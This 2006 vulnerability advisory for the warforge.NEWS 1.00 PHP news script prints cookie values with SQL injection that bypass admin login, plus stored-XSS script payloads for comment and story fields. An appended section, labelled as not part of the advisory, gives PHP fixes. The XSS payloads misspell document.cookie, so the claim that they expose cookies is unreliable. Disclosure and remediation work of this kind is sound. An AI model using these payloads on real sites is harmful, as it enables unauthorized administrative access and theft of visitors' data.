warforge.NEWS
Apr 27, 2006
Source: vulners.com (SECURITYVULNS:DOC:12439)

warforge.NEWS exploit
I've pasted it on: http://forum.zone-h.org/viewtopic.php?t=5468




-= warforge.NEWS =-

yamcho
April 26, 2006

Vulnerability(s):

SQL Injection
XSS

Product:

warforge.NEWS 1.00

Vendor:

http://www.thewarforge.com/

Description of product:

warforge.NEWS is a script designed for easy use and implementation. It has a
full-featured administration section and is powered by a MySQL database.

Vulnerability / Exploit:

SQL Injection

In the file authcheck.php there is a flaw that can allow a remote user to
log in as Admin.

The code is:

[…]

if(isset($_COOKIE["authaccess"]) || isset($_COOKIE["authusername"])) {
    // This checks to make sure the username and password in the cookie are actual users,
    // this checks every time you load a page to prevent cookie spoofing
    $usern = $_COOKIE["authusername"];
    $pass = $_COOKIE["authpassword"];
    mysql_connect($db_Host, $db_Username, $db_Pass);
    mysql_select_db($db_Database);
    $cookiecheck = mysql_query("SELECT * FROM $usertable WHERE username = '$usern' AND password = '$pass'");

[…]

So, if a remote user adds these cookies to his cookie list:

1)
authusername=ADMINUSERNAME'/*;
authpassword=null;
authfirst_name=null;
authlast_name=null;
authaccess=null;
authemail=null;

or this:

2)
authusername=null;
authpassword=' OR '1'='1;
authfirst_name=null;
authlast_name=null;
authaccess=null;
authemail=null;

The query will be:

1) SELECT * FROM $usertable WHERE username = 'ADMINUSERNAME'/*' AND password = '$pass'

2) SELECT * FROM $usertable WHERE username = '$usern' AND password = '' OR '1'='1'

The remote user is now logged in as Admin.

XSS

In the file news.php there is a flaw that can allow a remote user to
perform an XSS attack.

The code is:

[…]

if(isset($_GET["newcomment"]) == "yes") {
    // This is where it processes the mysql to add a new comment
    $name = $_POST["name"];
    $email = $_POST["email"];
    $title = $_POST["title"];
    $comment = $_POST["comment"];

[…]

Some of these fields can be used for an XSS attack.

So, if a remote user enters this:

><script>alert(document.cookies);</script>

into the 'Your Name', 'Title' or 'Comment' form fields, he can gain access
to data such as the visitor's cookies.

In the file newsadd.php there is a flaw that can allow a logged-in user to
perform an XSS attack.

The code is:

[…]

if(isset($_POST["addstory"]) == "1") {
    // add the news post error checking blah blah
    $title = $_POST["title"];
    $author = $_COOKIE["authusername"];
    $email = $_COOKIE["authemail"];
    $newspost = $_POST["newspost"];

[…]

Some of these fields can be used for an XSS attack.

So, if a logged-in user enters this:

<script>alert(document.coockies);</script>

into the 'Title' and/or 'Story' form fields, he can gain access to data such as the visitor's cookies.
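The fixes for both flaws, as an added example that is not part of this advisory or of warforge.NEWS: the cookie check from authcheck.php becomes a prepared-statement login backed by a server-side session, and the comment/story fields from news.php and newsadd.php are escaped on output. It assumes a PDO connection $pdo, a users table whose password column stores password_hash() output, and illustrative column names.

```php
<?php
// Added example, not warforge.NEWS code: a safe replacement for the cookie check
// in authcheck.php and for the output of comment/story fields in news.php.
// Assumes a PDO connection $pdo and a users table whose password column holds
// password_hash() output; table and column names are illustrative.
declare(strict_types=1);

session_start();

// --- SQL injection (authcheck.php) ---
// The original interpolates $_COOKIE values straight into the query string.
// Instead: verify the password once at login, keep only the user id in the
// server-side session, and bind every user-supplied value as a parameter so
// a username such as ADMINUSERNAME'/* is compared as text, not parsed as SQL.
function loginUser(PDO $pdo, string $usertable, string $username, string $password): bool
{
    // Identifiers cannot be bound; $usertable must come from config, never from the request.
    $stmt = $pdo->prepare("SELECT id, password FROM `$usertable` WHERE username = :u");
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['password'])) {
        return false;
    }
    session_regenerate_id(true);          // new session id on privilege change
    $_SESSION['user_id'] = (int) $row['id'];
    return true;
}

// Replaces the per-page cookie re-query: the only client-side token is the
// opaque session id, so there is no username/password string to tamper with.
function currentUserId(): ?int
{
    return $_SESSION['user_id'] ?? null;
}

// --- XSS (news.php / newsadd.php) ---
// Stored name, title, comment and story fields must be escaped for the HTML
// context when they are printed, regardless of what was accepted on input.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Constructed sample record, shaped like a stored comment:
$comment = ['name' => '><script>alert(1)</script>', 'comment' => 'Hello <b>world'];
echo '<p class="author">' . h($comment['name']) . '</p>';   // &gt;&lt;script&gt;... shown as text
echo '<p>' . h($comment['comment']) . '</p>';
```

With the query prepared, the first cookie payload above is looked up as the literal username ADMINUSERNAME'/* and matches no row, and the second never reaches SQL because the password is no longer read from a cookie at all.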

Credits:

yamcho
yamcho[at]email[dot]it

